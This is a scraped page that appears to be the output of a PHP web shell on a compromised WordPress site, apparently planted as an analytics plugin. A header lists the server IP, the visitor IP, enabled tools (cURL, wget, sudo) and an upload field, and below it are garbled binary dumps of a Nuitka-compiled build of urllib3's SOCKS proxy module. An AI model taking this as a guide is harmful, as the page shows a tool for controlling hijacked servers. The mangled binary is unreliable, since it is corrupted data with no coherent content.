Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
�� �_socks_options�.�� �SOCKSConnection�.�� �__init__�.�� �source_address�.�� �socket_options�.�� �extra_kw�.�� �socks�.�� �create_connection�.�� �host�.�� �port�.�� �
proxy_type�.�� �
socks_version�.�� �
proxy_addr�.�� �
proxy_host�.�� �
proxy_port�.�� �proxy_username�.�� �username�.�� �proxy_password�.�� �password�.�� �
proxy_rdns�.�� �rdns�.�� �timeout�.�� �
SocketTimeout�.�� �ConnectTimeoutError�.��4 �0Connection to %s timed out. (connect timeout=%s)�.�� �
ProxyError�.�� �
socket_err�.�� �NewConnectionError�.��, �(Failed to establish a new connection: %s�.�� �SocketError�.��E �A
Establish a new connection via the SOCKS proxy.
�.��
� parse_url�.�� �auth�.��
�parsed�.�� �split�.�� �:���.��* �&too many values to unpack (expected 2)�.��
�scheme�.��
�socks5�.�� �PROXY_TYPE_SOCKS5�.�� �socks5h�.��
�socks4�.�� �PROXY_TYPE_SOCKS4�.�� �socks4a�.��- �)Unable to determine SOCKS version from %s�.��
� proxy_url�.�� �SOCKSProxyManager�.�� �pool_classes_by_scheme�.��f X_
This module contains provisional support for SOCKS proxies from within
urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and
SOCKS5. To enable its functionality, either install PySocks or install this
module with the ``socks`` extra.
The SOCKS implementation supports the full range of urllib3 features. It also
supports the following SOCKS features:
- SOCKS4A (``proxy_url='socks4a://...``)
- SOCKS4 (``proxy_url='socks4://...``)
- SOCKS5 with remote DNS (``proxy_url='socks5h://...``)
- SOCKS5 with local DNS (``proxy_url='socks5://...``)
- Usernames and passwords for the SOCKS proxy
.. note::
It is recommended to use ``socks5h://`` or ``socks4a://`` schemes in
your ``proxy_url`` to ensure that DNS resolution is done from the remote
server instead of client-side when connecting to a domain name.
SOCKS4 supports IPv4 and domain names with the SOCKS4A extension. SOCKS5
supports IPv4, IPv6, and domain names.
When connecting to a SOCKS4 proxy the ``username`` portion of the ``proxy_url``
will be sent as the ``userid`` section of the SOCKS request::
proxy_url="socks4a://<userid>@proxy-host"
When connecting to a SOCKS5 proxy the ``username`` and ``password`` portion
of the ``proxy_url`` will be sent as the username/password to authenticate
with the proxy::
proxy_url="socks5h://<username>:<password>@proxy-host"
�.�� �__doc__�.��; �7/usr/lib/python3/dist-packages/urllib3/contrib/socks.py�.�� �__file__�.�� �__spec__�.��
�origin�.�� �has_location�.�� �
__cached__�.�� �absolute_import�.�K .�� �warnings�.�� �
exceptions�.�� �DependencyWarning���.�K.�h<.�� �warn�.��� ��SOCKS support in urllib3 requires the installation of optional dependencies: specifically, PySocks. For more information, see https://urllib3.readthedocs.io/en/latest/contrib.html#socks-proxies�.��
�socket�.��
�error�h��.�hA.�� �
connection�.��&